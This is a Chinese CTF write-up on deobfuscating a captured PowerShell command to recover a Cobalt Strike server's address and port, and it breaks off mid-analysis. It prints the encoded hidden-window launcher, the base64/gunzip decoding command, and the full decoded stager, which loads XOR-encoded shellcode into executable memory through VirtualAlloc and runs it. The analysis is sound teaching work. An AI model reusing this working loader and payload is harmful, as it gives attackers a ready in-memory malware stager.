一道Powershell代码混淆的CTF题

0x01 题目

**题目：**蓝军捕获了以下代码，要求解出CS连接的服务器地址和端口！

注：代码很长，直接复制到本地再看

%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWAA2ADMATwBpAFMAaABiAC8ASABQADgASwBQAHEAUgBLAEwAVQAyAEMAagA1AGcANABXADEATgAxAFYAVQBCAFEAUQBCAFQAZgB1AGEAawBVAGoAeABaAFIAbwBIAGsAMABLAE4ANgBaAC8ALwAwAGUAVQBIAE0AegBPADUAbgBkAHEAZABxADEAaQByAEsANwBPAGMALwBmAGUAZgBSAEIAUgBlAFIATwBKAGEARgB0AEUAQQBtAGIAaQBMAHEAYgBvAHoAQwB5AHMAVQBmAFYAQwA0AFYAYgBCAGcAdQBFACsAawByADkAVQBTAHgAcwBZAHMAOABnADIAWABHADIAZQBMAE0AUQBlAGYATgBEAGIATAB4AHAAcABoAG0AaQBLAEsATAArAEsAdAB3AG8AVwBxAGkANQBWAE8AawAyADAAYwBJADMARgA1AHUAeABnADYAcABVAHYAcwBrAEkAawBSAG0ASABxAEgAeAB6AFUANwBqAEoAagAyAEkAdgAwAGoAYgBvAHoAZABPAEkAbgBhAEEAMwBGADUARQB0AE4AaQBOAFEAVgBIAHIAcAArAEQANgBEAFgAYwAzADIAWAByADkAOAA2AGMAVgBoAGkARAB4AHkAMwB0AC8AMwBFAGUAbABFAEUAWABKADEAeAAwAFoAUgBxAFUAeAA5AG8AeABaAGIARgBLAEsANwBrAGIANQBEAEIAcQBIACsAbwBtADcAZgA3AHYAcwBPADEAagBYAG4AUQBwAGIAMgBOAEcATQBMAEQAbgBVADgATQAzAHMAbgBZAGsAUABMAFAATABoAFgAZgBjAGMAbQBwAGUASwBmAGYAeABiAEwATAAzAGUAMQAxADMAcwAyAGkARABVAG4ASwBoAFgAVgBOAEMATABJAHYAVABjAGQAcAAxAGkAbQB2AHAAYwB6AGgAZABQAFUAUgA2AFcAaQBaAEIAcwBoAGoAdgBDAEcAMwBDADkAcwByADEARwAvAG4AKwBYAFcAeQA3AG4AeAAwAHQAbgAyAFkAdgBuAGkAbQBlAFYAcgA0AE0AZQB2AG4AYwB5AGsAbgBuAGwASwBSAFYAZwBxAGcARQAzAG4AagBHAEcAeABTAHIAMQBrACsAbAA1AGUAWAA2AGsALwAzAHEAMgBaAHgAQgA2AHgAWABYAFEAdgBlAEEAUwBGADIARgBkAFIAbQBOAGcARwBpAHUANQA1AHoAVABNAGQATgBFAEUAYgBZAEMAdABHAEUARAA3AFAASwBwAGIAQgBpAEIAQwBSAE8AUABTAG8AcQB5ADMAQQBsACsAQQA5AEsAdAAxADYAcwBlAE4AVQBRAGUANwBMADcAOABwADkATABjAG4AbwBjAEEAWAAzAGQANQBsAEsASAA1AG0AQQBTAGkARgBoAHUAWAByAEoAaQBkACsAQgBRADgAcgB6ADUAaQB3AE8AMwBQAG4ASgArAGcALwBKAFYAWQBiAGYAVAB3AGwAVwBMAG4AdwB2AGYASgBLAHEASgBuAEsAUQBwAFIASAAwAFIAZwBEAGYARAA3AGwAYQB1AEwAbAA1AHkAWgBjAEkALwBDAGsAcABPAEwASgB6AHYAcQA4AFUAWABhAFUAawBNAEUASQBqAE8ARQB5AHoAYwBFADcARABHAEoAVgBmAC8ANABuAFAAVwBlADIAVgBNADYAcgArAFUAbABEAHQAeQBuAFgAaABPAFkAZgBuAGIATQBkAFgANgBtAFcATwBiAGYATwAxAGMARgBNAHUAWABMAEkAbgBPADMALwBUAFkAOQBzAHgAVQBaAGkAOQAvADMAVQAxAE0ARwBoAGoAZQA0AGgASgBQAGMAMgAxAGoAVwB2AEMAbAB6ADYATABHAGQAbwA0AEsATQBmAGoALwBrAG8AbQBnADUAMgBsADQAdQBVAEYATQBwAGsATABPAHMAVQBNADAASgBlAGYAMgBWAGoAWABKAHUAKwA4ADMAYgBOAHgASABRAFAAaQBIAG8ARgBWAGsAQgBMAGwASAA0ADAANQB4ADcAQgBVAEYARAB3AEoAdQBZAEQAZgBlAFEAOQBwAGUAcgB1AEIATQBrAE4AWAA2AGsAdABwAHAAVgBmAHQAMgBUADcATAA1AFoANgBqAFIAVgBHAFYAVQBtAEsAbwBjADYATgBLAHEAVQBoAHoAawBGAG0AbABPAGwANQBrAFgAMQA1ADEAWQBvAEwAegBaAGYARQBmAGMANgBYAFkASQBiAGEAaABSAGUAUQBxADcAcgBYADgAQwBhAFEAWAAxAFQAMwBzAFEAYwBYAEUAQgBrAFEAWABZAEoAaQBxAFAAagBKAHMAegBjAGwAUQBxAFYASwA4AGIAYQBKAHUAcQB0AHIAVwAxAFkAVABpAHAANQBqADAATgBNAGUAQgBrAGcATgBKAEMAYwBRAEUAVABqAEkAcwBWAEoATABsAFQARwBoAFcALwB6ADAALwB5AHYAYwBxAEkAbwBMAHIATwA4AGcARgA2AHIAdwBMAGMAWQA1AG0AUQBjACsANQBWAEYAUwBlAGIAcABxAEYAegBPAEoALwBNAFAAdABhAEoAKwBlAGkAeQBMAEMANgBnAHYAVABCAGEARQBnAEEAMQBjAEcAawBTAHMAMwB0AGsARQBCAGYASwAxAFoALwBTAHIAegAvAHoAYgB3AGYAVwA4AHcAUABaAHYAWgBDAGQAQQBsAGsASwBTAC8ARQBsADIANQBLAHMAbgBMAEoASwBZADMAcwBjAHYAbgA2AGoAbQBXAE8AWABFAGcAQQBOAFMANwBFAGIAbABlAEwAVQBLAHUAcAA1AG0AMgBzAFYARwB3ADgAeAA0AEcAUQBTAHIAdAB4AEsAKwB5AHoAQwBjAGMASABQAEQAdQBGAEoANABHAG4ARQBYAEMAcwBLAEEANABtAGYAbgBjAGkARwBtAHcAOABVAG4AaAA2AHMAQgBIAEcAegAwAHcAegBQAHMAUgBDAFAATwAzAFMARABZADQARwB1AGwAUABRAFoAegBkAEMATQBzAEsAcgBXAHUAdwAyAGEANgBZAHYASgBEAEsAYwBSAFUAOABCAEgAegBGAEMAdwBuAFQANABlAG8AQwA1AGwAbQBXADMATAAzAEwATwAvAEcAUAA5AFUATgBPAFgAQQB2AGUAawA5ADcAawBtAFAANAArADQAagBKADQAWABrAGkANABYADkATgBvAFkAMQBnADkAQwAwAHMATQBEADQASAB0AHUAKwBWADcAMwBZAEQAWQBSAE8AMgBpAGgAcABXAGcAYwBHAHUAUQBaAGEAZABZAHgASABjADQAcgBLAGwAMwByAHoAMQBOAFoAbgBMAE8AKwByAEgAcQBtAHEATgBmAEcAMwBFAEEAKwAxAFYAUAB3AEMAZgB4AFMARwAvAHkARQBOAHUARgBSAGoAMAA1AHQAZwBhAGQARwBPAHcAcgA0AHoARgAvAFUARgBRAFAARABHAHcAdwBFAGYAcABDAHEAagA1AFkAdABwAFAATABCAG8AQQBrAGQAaABDAGUAbgBvAGEAeABQAGEAZgBBAE0ALwBIAEkAVABNAEQAbQBxAHEAVABSAHAAdABzAHkAagBzAGUAUQBPAHgAbABJAFcAVQAzADQAbAA5ADAARgBIAEUAQwArAHMASgBpACsATAArAE4AagBaAEMAYQAyAFEAVQBWAFgAegBwAEUANgBQAE4AYgBXADIAZABoAEoAdABhAGIAUwA5AFEANgA1AGYATgBZADgASABjAHgAYQBOAEIAbABPAHkAYQBpAGkAYQAyADAAeABUAHIANgBVAEsATwArAEUAbwBHAGoANgBaAEwAdwBlAHQAVQBFAHQANwB2AG0AZwBqAHYAYgBzAGgAbQBkAHkAQgB1AEwAWQBHAGIAUgBiAFcATABEAG4AUwBxAGoAcABKAFQAZABEAHIAOABGAE4AbQBDAEgAcQA5AG4AaQBTAEIARAA5AG8AagB0ADkAcQBqAGgAagBKAGMAeQBDAGUAagAwAFIAVwBOAE4AQgBUAEEARAAyAFgAWQBzAGsASAAyAE0ANQBFAGEAYwBNADcAMAAxADQAOABtAE8AOQB1AHAANwBBAEcAYgBnAHMAWABpAHcAWABCAHAAdABaAGEAUAB3AFUAbgBoAG4AWgBvADkAcQB1AGwAeAB2AHoASwBQAGUANgAyAFEAKwBCADcAbQBtADcAWABBAHEAbABmAEEATwBkAFAAdgAxAEsAZgBtAGIASQBrAGQAdgBrAEkARwBEACsANQBzADEASAByAFUAMAAvAGoAQgBQAEQANwBJAHcAQgAwAFIAMQBuAG0AbwBLAGEANgAvAFEATAA0AHoAbwBqAGQAcwBxAE0AcgAxAEcAYgB1AGUATQBPADYAQQBuAGUAeAByAHkALwA1AFkAagBxAGUAYwBNADUAegBTADcAUgA3AFQAWABjAG4AcwBRAFIATABIADcASABFADAAbwB3AGQATABkAGMAOABwAGsANgAzAEYANgBGADQAMwBXAEYAdQBTAHgAawB5AGsAVgBhAGMAeABHAFUANQBuAHAAagBUAG4ATwBvAHkAKwBOAEIAaAB1AFQASwB2ADkAagB0AHkAWQB6AFgAdwArAGsANQBmAEwATwBGAHIATQBhAG4ARQBNADEAbAB1ADgATQBoAHIAbQAxAGgAagBqAGUASwBnAHEAegBiAGsAZgBjACsAcgB3AGEAUwBLADEAVgBpAHYATQBMAHEAeABIAFcAVwBtAHAANwBUADAAegBTAFoAKwBTAFcAcQBYAHQAdABKAGEASgB0AGwAbgB2ACsAOAA5AE4ATABuAEEAbgBzAFQAbQBXAEoAVgA2AGUASQAxAFoAcQBMAHgAUgBtAEYAaQByADkAVQA1AGUAdgBrAC8AWABhAGwALwBaAGEANQBMAFcAUwBQAGgAdgA0AHMAagArAGIANwBlAHkAdABQAGYAYgAyAGsASABnADQARwBUAHoATwBEAHIASwA4ADYASgBLAGwAdQBlAGgAdQBCADAAKwBDAEsAZwA3AFgAUQBhAHQAegBXAE0AbQA0AFYAMgBIAG8AcgBiADcAcgBIAHAALwBkADkASQBqAEcAegBsAE8AMABhADIAKwBSAEkAZABhAEcAKwAwAEUAOABxADcAdAA2AHgAVwBHADIAeQB0AEsAYQBWADgAWQBLAHIANgBkAHkAZQByAFEAVwBkAGIARgBqADkAcABkAEQAcQBiAC8AcgBIAEMAYgBNAFkATQBOAEgALwBuAFQAagB1AHkAZAA5AHUAdABuADUAZgBXADAAZABJAG8ANQBPAFAARwAvAGsASwByAE8AdwBWAHgAbgBqAFYAUwBCAEwAYwB6AEoAegA5AG4AaAB5AGUAbABEAFcAagBqAEoAZAByAEMAdQAxAGoAYQBpADIAUgBpAEcAeQBWAGwATwB6AGYAdwBwAFkATABuAEUATgBsAHIARAAxADUASQBpAE0AcAAyAEIATABGAHMASgBPAGIAWQA4AFcAMQBoAEoAeQBjAGUALwBzAEkASQA5AFAAawBOAE0AaQBQAEQAdQBoAE0AUgBGAFIAMAB6AHcAYwBJAGMAZQBpAEEAYwA1AHEAWgBTAGMAawBmAG0AbwBNAFEAOQBaAGsAbwAxADAASAA5AGcAWQAvAEYAeQBWADkARQBSAHoATQBVADkAMgBQAEkAZQB5AGEAdABSAGYAaQBIAHQAUwA0ADMAawBjAFYAUgBnAHoASQBFACsAUwBkAHMATwB4AGIAOQBLAFIALwBvAEgAWABXAGcAcABqAFoAZQBkADEAWgBXAGYAZgBhADQAQgBEAG0AawBXAE4AMgB4AC8AKwBMAGcAdgA4ADcAaAAxAEQAdgAvAFEAbQA2AEUAagBTADgANwBMAHgAUwBLAFcAZAB6AHcAdgB1AGIAbAA5AHYAagA2ADMAVwB1AGUAOQAvAGYANgBVAGUAUQAxAG4AagBNAGUAbAAzACsASgB0AEUAKwBkAEwAaABmAEQAVQB1AFMARgBrAFoAYgB6AFkASABPAEIAdwBQAFAAOQBiAHIAaQBjAE0AaABkAHgAaABZAEYAMgB4AGwASABxAGYAVAA1AHAATAAxAEgAbwBZAGMAYwBtAEUASgBoAFQAcgAwADIAKwBZADcAagBZAEMATQBiAHQASAA0AHgAOABjAEQAWQBkAHgANwBHAFgAdQBFAHkAbQA4AEcAeQBVAGYAOQAwAFYAYQBiAGUAQwBXAEcANgBPAHYAdQBrAHgANQB0AE4AUABvAHgAYwBQAEwAegBPAFoARgBmAEMATAAxAC8AVwA0AEYANwAxAEEANABnAGkAOABpAHkAeQByAFYATAAwAHMAVQBIAFQAZABQAGIAZgBwAE0AdQBGADMANABlAGwAaAAvADIAMAA5AEMANgB1AG0AZwAxAGoASAB5AHoANQBxAE0AbgBKAE4AWgBVAHYANgBJAGUAeAA1ADYATAAvAFkAdwBCACsAVQBQAHIAZgBvAGMAMwBBAHkAKwBlADUAZAArAGgAeQBnAHoANwBIAHEAMQB3AG8ALwBsAEUAbwBDAEIAdgBxAHcAMwBsAGsAbgArAEIAcgBCAFEAWABVAGMANQA1ADcARQBkAEYAQwBjAHIAZgBEAE8AbgB6AGEANQBIAGQAMQA2AFYAWQByAFUAdwBLADcAcABHADQAMQA2AGoAdAAxAEIAKwA1ADEAbwBrAFkAZAB2AG0AOQBDAEsAOAA0AHUAYgB1AHIAOAB1AGYAYQBOAE8AbQBqADIAbQBmAEUAYgBOAFUARQBHAGcAbgBIADcAYgBvAEIAMQB5AEYASQBFADgAMQBjAG0ATwBoAGUAUwBFAGMAUABaADMANABXAEQAVwBDAGoALwBEAFEAQQBBACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA

0x02 过程

后面的密文盲猜一个base64，用网上的解密工具试了一下有空格，干脆在Kali里面去搞。

粘贴密文保存成secret文件，方便在命令行base64解密。

第一次解密

第一次base64解密后结果为：

第一次解密

发现里面又有base64密文：

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

密文带有斜杠，解密八成是乱码：

第二次解密

这时候仔细观察第一次解密后的密文，发现在密文最后有IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

其中GzipStream是重点，说明密文采用了Gzip压缩。这时候只需要解压缩就可以了。

执行命令：

echo -n "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" | base64 -d | gunzip

得到明文：

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
        Param ($var_module, $var_procedure)
        $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
        $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
        return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
        Param (
                [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
                [Parameter(Position = 1)] [Type] $var_return_type = [Void]
        )

        $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
        $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
        $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

        return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDGZ5dEUjSEwodIgEoJKXg6X5qzPHl1iO1buG+VuC6rtpnoH41qg2+GNzdpA2TdUXolH+tJ/mUO65byu/dx/NX5qstEl/1PmpWeplO0fErSN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNExgDYWxqZhoYc3dhcQouKSP4VpuFSK7RM6YYoEWg5NP6S9kDRy7v1+9l6XvafZkG84FqmRudQNMHNVeEM9WPDUrPGzBH2tZZpMkasn6vGEqpNpUUjihiQnkd4eovJ5UwNNWBtXdWBhJ7ISLKZq6AwYNoC+D0hbjBx8myxeQl7sj9hecL1KkJuU2mb+lDhPXgV+QPHbyNyxgW2LAdGXKMGjAwRDJfHspTfpmzbTfjpGaZreF0vnnOmPUrC+QoYqNMVtUlkoRz/PZlPTWZ+1fLS6OregYTdGzqEFvmcEtE2vxec7qhtWIjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3BIXGg0RGw0bEg0SGiMjIyMg')

for ($x = 0; $x -lt $var_code.Count; $x++) {
        $var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
        start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
        IEX $DoIt
}

可以看到中间又有一个base64的密文：

